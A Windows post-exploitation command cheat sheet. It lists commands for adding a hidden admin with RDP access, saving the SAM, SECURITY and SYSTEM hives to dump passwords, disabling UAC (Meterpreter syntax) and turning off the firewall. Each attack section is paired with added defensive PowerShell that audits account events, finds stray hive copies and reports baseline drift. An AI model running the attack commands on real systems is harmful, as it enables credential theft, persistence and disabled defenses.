Add Admin User w/ RDP

net user <username> <password> /ADD
net localgroup administrators <username> /ADD
net localgroup "Remote Desktop Users" <username> /ADD
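The three commands above leave a clear audit trail on a host with account-management auditing enabled: event 4720 (user account created) and 4732 (member added to a security-enabled local group). The following PowerShell is an added example, not part of the original cheat sheet; it pulls those events for the last few days, resolves the member SID in 4732 to a name, and then lists the current membership of the two groups so it can be compared against a known-good baseline. It assumes "Audit User Account Management" and "Audit Security Group Management" are enabled and that it runs from an elevated shell (reading the Security log requires it).

```powershell
# Added example: review local account creation and group additions on this host.
param([int]$Days = 7)

$since  = (Get-Date).AddDays(-$Days)
$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720, 4732; StartTime = $since } `
            -ErrorAction SilentlyContinue   # no matching events is not an error here

function Resolve-Sid([string]$Sid) {
    # Event 4732 carries the member as a SID; translate it when the account still exists.
    try { (New-Object System.Security.Principal.SecurityIdentifier $Sid).Translate([System.Security.Principal.NTAccount]).Value }
    catch { $Sid }
}

foreach ($e in $events) {
    $xml  = [xml]$e.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    switch ($e.Id) {
        4720 { [pscustomobject]@{ Time = $e.TimeCreated; Event = 'Account created'
                                  Target = $data['TargetUserName']; Group = ''
                                  By = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])" } }
        4732 { [pscustomobject]@{ Time = $e.TimeCreated; Event = 'Added to local group'
                                  Target = Resolve-Sid $data['MemberSid']; Group = $data['TargetUserName']
                                  By = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])" } }
    }
}

# Current membership of the two groups the commands above touch, for comparison with a baseline.
foreach ($g in 'Administrators', 'Remote Desktop Users') {
    "`n== $g =="
    Get-LocalGroupMember -Group $g -ErrorAction SilentlyContinue | Select-Object Name, ObjectClass, PrincipalSource
}
```

Run it as a script (`.\Review-LocalAdmins.ps1 -Days 30`) or paste it into an elevated console; a new entry in either group that has no matching 4732 event in the window is worth a second look, since it means the addition happened before the window or while auditing was off.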

Tasks / Services

  • Start or stop a service
    net start|stop servicename
  • View the currently running tasks
    tasklist
  • Kill a task by name
    taskkill /F /IM task.exe
  • Kill a task by PID
    taskkill /PID PID /F

Base64 encoding / decoding

  • base64 encode
    certutil -encode inputfile outputfile
  • base64 decode
    certutil -decode inputfile outputfile
    (certutil -encode wraps the output in -----BEGIN CERTIFICATE----- / -----END CERTIFICATE----- lines and 64-character rows; certutil -decode accepts and strips them, other decoders may not)

Dump passwords

  • via reg.exe (needs an elevated prompt)
    reg.exe save hklm\sam c:\sam_backup
    reg.exe save hklm\security c:\security_backup
    reg.exe save hklm\system c:\system
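Hive copies made with `reg save` keep their on-disk format whatever they are named, and every registry hive file begins with the four-byte signature `regf`. The following PowerShell is an added example, not part of the cheat sheet, that uses that header to find stray hive exports on a host (the `c:\sam_backup`-style files above included) without relying on the filename; the roots it scans and the exclusions for the legitimate hives Windows keeps (the `System32\config` directory and per-user `NTUSER.DAT` / `UsrClass.dat`) are assumptions to adjust per environment.

```powershell
# Added example: locate saved registry hives by their "regf" header rather than by name.
param([string[]]$Roots = @('C:\Users', 'C:\Windows\Temp', 'C:\', $env:TEMP))

$sig = [byte[]](0x72, 0x65, 0x67, 0x66)   # ASCII "regf", the hive file signature

function Test-HiveHeader([string]$Path) {
    $fs = $null
    try {
        $fs   = [IO.File]::OpenRead($Path)
        $head = New-Object byte[] 4
        if ($fs.Read($head, 0, 4) -ne 4) { return $false }
        return (($head -join ',') -eq ($sig -join ','))
    } catch { return $false }              # locked or unreadable files are skipped
    finally { if ($fs) { $fs.Dispose() } }
}

Get-ChildItem -Path $Roots -File -Recurse -ErrorAction SilentlyContinue |
  Where-Object {
      $_.Length -ge 4 -and
      $_.FullName -notmatch '\\Windows\\System32\\config\\' -and   # the live hives
      $_.Name     -notmatch '^(ntuser\.dat|usrclass\.dat)'         # per-profile hives
  } |
  Where-Object { Test-HiveHeader $_.FullName } |
  Select-Object FullName, Length, LastWriteTime |
  Sort-Object LastWriteTime -Descending
```

Anything this lists outside a known backup location deserves the same handling as a credential store: the SAM and SECURITY hives only yield their contents together with SYSTEM, which is why the three commands above always export all three.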

Security settings

  • Allow RDP
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  • Disable UAC (Meterpreter reg command syntax, not reg.exe)
    reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system
    reg setval -v EnableLUA -d 0 -t REG_DWORD -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system
  • Refresh policies
    gpupdate /force
  • Disable the Firewall
    netsh advfirewall set allprofiles state off
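Each entry in this section flips one setting that a hardened baseline normally has the other way, so the useful defensive counterpart is a check that reports drift. The PowerShell below is an added example, not part of the cheat sheet: it reads the same two registry values the entries above write (`fDenyTSConnections` and `EnableLUA`) and the per-profile firewall state, compares them with expected values, and exits non-zero when anything is off. The expected values are an assumption for a typical workstation baseline (RDP off, UAC on, firewall on for all profiles); change them to match the policy that actually applies.

```powershell
# Added example: report drift from a hardened baseline for the settings this section changes.
$checks = @(
    @{ Name  = 'RDP disabled (fDenyTSConnections)'
       Path  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
       Value = 'fDenyTSConnections'; Expected = 1 },
    @{ Name  = 'UAC enabled (EnableLUA)'
       Path  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
       Value = 'EnableLUA'; Expected = 1 }
)

$results = @(foreach ($c in $checks) {
    # A missing value comes back as $null, which is reported as a failure rather than silently passing.
    $actual = (Get-ItemProperty -Path $c.Path -Name $c.Value -ErrorAction SilentlyContinue).($c.Value)
    [pscustomobject]@{ Check = $c.Name; Expected = $c.Expected; Actual = $actual; OK = ($actual -eq $c.Expected) }
})

# Firewall state per profile; "netsh advfirewall set allprofiles state off" turns all three off.
$results += @(Get-NetFirewallProfile | ForEach-Object {
    $enabled = ($_.Enabled.ToString() -eq 'True')   # Enabled is a True/False/NotConfigured enum
    [pscustomobject]@{ Check = "Firewall enabled ($($_.Name) profile)"; Expected = $true; Actual = $_.Enabled.ToString(); OK = $enabled }
})

$results | Format-Table -AutoSize
if ($results | Where-Object { -not $_.OK }) { exit 1 }   # non-zero exit for scheduled or fleet-wide runs
```

Because the check reads the final registry values, it catches the change whether it was made with `reg add`, the Meterpreter `reg setval` form above, or Group Policy; pair it with `gpupdate /force` if policy is expected to restore the values and you want to confirm it actually does.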

Variables

  • Show all variables
    set
  • Windows TEMP folder
    %TEMP%
  • Current domain and user (if whoami is not available)
    echo %USERDOMAIN%\%USERNAME%

Location of files

  • Repair files like SAM
    c:\windows\repair\
  • Windows TEMP folder
    %TEMP%
  • Search for a specific file (wildcards are supported)
    dir /S /P "filename"